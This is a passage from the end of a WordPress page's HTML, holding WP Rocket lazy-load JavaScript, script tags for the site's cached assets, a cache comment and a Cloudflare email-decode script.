window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}};window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){return}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){return}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async src="//vipsecurity.zone/wp-content/plugins/wp-rocket/assets/js/lazyload/12.0/lazyload.min.js"></script> <script src="//vipsecurity.zone/wp-content/cache/min/1/802f06929a36dcf9eb2698974f49e1b9.js" data-minify="1" defer></script><noscript><link rel="stylesheet" href="//vipsecurity.zone/wp-content/cache/min/1/cd1956701f7fdcfaa1f5c58986f38c49.css" data-minify="1" /></noscript></body></html>
<!-- This website is like a Rocket, isn't it? Performance optimized by WP Rocket. Learn more: https://wp-rocket.me - Debug: cached@1652469486 --><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>